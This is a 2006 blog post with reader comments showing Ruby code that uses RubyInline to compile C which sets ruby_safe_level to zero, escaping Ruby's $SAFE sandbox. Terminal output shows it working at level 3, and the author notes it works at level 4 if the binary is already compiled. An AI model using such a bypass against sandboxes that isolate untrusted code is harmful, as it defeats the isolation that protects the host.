Segment7: Reducing $SAFE

Reducing $SAFE

drbrain@segment7.net (Eric Hodel) — Wed, 30 Aug 2006 17:30:00 -0700

Ya you are correct, it won't let you change the safe level. I wonder how hard it would be to bypass it though using something like rubyinline?

—Re: $SAFE =4 safe enough? via snacktime

require 'rubygems'
require 'inline'

class DeSafe
  inline do |builder|
    builder.prefix "RUBY_EXTERN int ruby_safe_level;"

    builder.c <<-EOC
      static void
      reduce() {
        ruby_safe_level = 0;
      }
    EOC
  end
end


$SAFE = ARGV.shift.to_i rescue 0

p $SAFE

DeSafe.new.reduce

p $SAFE

$ rm -fr ~/.ruby_inline/; ruby desafe.rb 4
desafe.rb:20:in `write': Insecure operation `write' at level 4 (SecurityError)
        from desafe.rb:20:in `p'
        from desafe.rb:20
$ rm -fr ~/.ruby_inline/; ruby desafe.rb 3
3
0

"Reducing $SAFE" by Eric Hodel

Fri, 01 Sep 2006 12:09:47 -0700

I backed off typo by several revisions, the trunk is currently broken in a mysterious way.

"Reducing $SAFE" by James Mead

Fri, 01 Sep 2006 10:30:29 -0700

Very naughty ;-)

BTW you have an error in your Articles xml feed. See here for details

"Reducing $SAFE" by Eric Hodel

Wed, 30 Aug 2006 22:04:30 -0700

You mean external to your own? Only if you can attach to it with a debugger or otherwise modify its memory space.

Note that this allows you to lower $SAFE even when $SAFE >= 4 if you’ve already compiled the binary.

"Reducing $SAFE" by Daniel Berger

Wed, 30 Aug 2006 19:37:14 -0700

That’s just wrong. :-P

I wonder if this could be abused to alter the $SAFE level of an already running Ruby interpreter somehow…